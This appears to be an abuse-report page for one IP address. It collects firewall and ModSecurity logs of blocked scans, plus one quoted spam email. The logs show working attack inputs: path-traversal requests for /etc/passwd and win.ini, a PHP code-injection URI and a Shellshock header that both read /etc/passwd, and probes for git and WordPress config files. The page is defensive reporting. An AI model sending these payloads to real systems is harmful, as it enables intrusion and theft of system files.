๐บ๐ธ
TPI-Abuse
2026-01-17 07:03:10
(4 months ago)
(mod_security) mod_security (id:210492) triggered by 45.135.139.13 (-): 1 in the last 300 secs; Port ...
show more
(mod_security) mod_security (id:210492) triggered by 45.135.139.13 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sat Jan 17 02:03:03.803361 2026] [security2:error] [pid 31472:tid 31472] [client 45.135.139.13:47453] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "cpcalendars.nbcnewsradio.com"] [uri "/img../.git/config"] [unique_id "aWs0J4M5aYoKHA1ChWT75AAAAAA"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2025-11-13 11:42:24
(6 months ago)
(mod_security) mod_security (id:210492) triggered by 45.135.139.13 (-): 1 in the last 300 secs; Port ...
show more
(mod_security) mod_security (id:210492) triggered by 45.135.139.13 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Nov 13 06:42:19.194304 2025] [security2:error] [pid 5537:tid 5537] [client 45.135.139.13:34255] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "ftp.nbcnewsradio.com"] [uri "/wp-config.php.save"] [unique_id "aRXEG5wgaWEPXwVZEOWs0QAAAAs"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2025-07-26 23:33:23
(10 months ago)
(mod_security) mod_security (id:211190) triggered by 45.135.139.13 (-): 1 in the last 300 secs; Port ...
show more
(mod_security) mod_security (id:211190) triggered by 45.135.139.13 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sat Jul 26 19:32:28.390829 2025] [security2:error] [pid 26228:tid 26531] [client 45.135.139.13:51255] ModSecurity: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||mail.kettlehill.net|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "mail.kettlehill.net"] [uri "/fuel/pages/select/"] [unique_id "aIVljFo7USZqEn78mkOxlAAAAQw"]
show less
Brute-Force
Bad Web Bot
Web App Attack
Anonymous
2025-07-22 14:22:04
(10 months ago)
Ports: 2077,2078,2082,2083,2086,2087,2095,2096; Direction: 0; Trigger: LF_DISTATTACK
Brute-Force
SSH
Anonymous
2025-06-22 22:15:40
(11 months ago)
Ports: 2077,2078,2082,2083,2086,2087,2095,2096; Direction: 0; Trigger: LF_DISTATTACK
Brute-Force
SSH
๐บ๐ธ
TPI-Abuse
2025-05-29 17:16:19
(1 year ago)
(mod_security) mod_security (id:210730) triggered by 45.135.139.13 (-): 1 in the last 300 secs; Port ...
show more
(mod_security) mod_security (id:210730) triggered by 45.135.139.13 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu May 29 13:16:10.534180 2025] [security2:error] [pid 3052364:tid 3052364] [client 45.135.139.13:53161] ModSecurity: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||ftp.farmers123.com|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "ftp.farmers123.com"] [uri "/spring-mvc-showcase/resources/%5c%5c..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/windows/win.ini"] [unique_id "aDiWWlu9CupJp4hflGOR-gAAAAk"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐ฉ๐ช
Alejandro Docasar
2024-11-26 14:42:01
(1 year ago)
Web App Attack
๐บ๐ธ
TPI-Abuse
2024-10-27 02:39:26
(1 year ago)
(mod_security) mod_security (id:221260) triggered by 45.135.139.13 (-): 1 in the last 300 secs; Port ...
show more
(mod_security) mod_security (id:221260) triggered by 45.135.139.13 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sat Oct 26 22:39:18.376079 2024] [security2:error] [pid 12714:tid 12867] [client 45.135.139.13:47937] [client 45.135.139.13] ModSecurity: Access denied with code 403 (phase 1). Pattern match "^(?:\\\\'\\\\w+?=)?\\\\(\\\\)\\\\s{" at MATCHED_VAR. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "77"] [id "221260"] [rev "3"] [msg "COMODO WAF: Shellshock Command Injection Vulnerabilities in GNU Bash through 4.3 bash43-026 (CVE-2014-7187, CVE-2014-7186, CVE-2014-7169, CVE-2014-6278, CVE-2014-6277, CVE-2014-6271)||webdisk.staging.kettlehill.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "webdisk.staging.kettlehill.com"] [uri "/cgi-bin/status"] [unique_id "Zx2n1sQgf9D2avDXGrUaBAAAAAE"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2024-09-03 18:43:52
(1 year ago)
(mod_security) mod_security (id:211190) triggered by 45.135.139.13 (-): 1 in the last 300 secs; Port ...
show more
(mod_security) mod_security (id:211190) triggered by 45.135.139.13 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Tue Sep 03 14:43:43.839634 2024] [security2:error] [pid 22484:tid 22484] [client 45.135.139.13:50105] [client 45.135.139.13] ModSecurity: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||mail.stdavids-media.com|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /?filename=../../../../../../etc/passwd&mphb_action=download"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "mail.stdavids-media.com"] [uri "/"] [unique_id "ZtdY3wMYFlCWWoH9_rvmIgAAAB8"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐ธ๐ฌ
oncord
2024-08-29 11:34:08
(1 year ago)
Form spam
Web Spam
๐บ๐ธ
nowyouknow
2024-08-26 23:02:59
(1 year ago)
(From [email protected] ) We contact your clients: Managed Cold Email Outreach Campaign offer ...
show more
(From [email protected] ) We contact your clients: Managed Cold Email Outreach Campaign offers everything you need to boost your outreach and drive resultsโall for under ยฃ200 monthly!
What You Get:
+ Five Email Domains ($75 Value) + Professionally Managed
+ Configuration & Warm Up & Launch
+ 25 Gmail Workspace accounts ($150 Value per Month)
+ 5 Simultaneous Campaigns
+ Up to 1250 Emails Sent Daily
+ Split Testing and Improvements
+ Top-Performing Email Content
+ Free Email Database (worth $500)
+ Industry, City, State Targeting + Email Campaign Tool Similar To Lemlist (worth $249/month)
+ Assistance by Dedicated Client Manager
For only ยฃ199 per month, youโll get the entire solution to power your email outreach efforts and see real results.
@ Order now: https://bit.ly/inboximpacts
To unsubscribe, reply to this email with 'Unsubscribe' as the subject.
3378 St Jean Baptiste St, Baie Ste Catherine, New York, United States
show less
Phishing
Web Spam
Anonymous
2024-08-21 21:29:28
(1 year ago)
45.135.139.13 - - [21/Aug/2024:23:29:28 +0200] "GET /server/node_upgrade_srv.js?action=downloadFirmw ...
show more
45.135.139.13 - - [21/Aug/2024:23:29:28 +0200] "GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini HTTP/1.1" 301 5725 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" 2740
...
show less
Hacking
Anonymous
2024-08-20 04:03:46
(1 year ago)
Ports: 80,443; Direction: 0; Trigger: LF_CUSTOMTRIGGER
Brute-Force
SSH
Anonymous
2024-08-19 02:05:59
(1 year ago)
Ports: 80,443; Direction: 0; Trigger: LF_CUSTOMTRIGGER
Brute-Force
SSH
๐ฉ๐ช
conseilgouz
2024-08-14 15:09:54
(1 year ago)
cow-Joomla User : try to access forms...
Hacking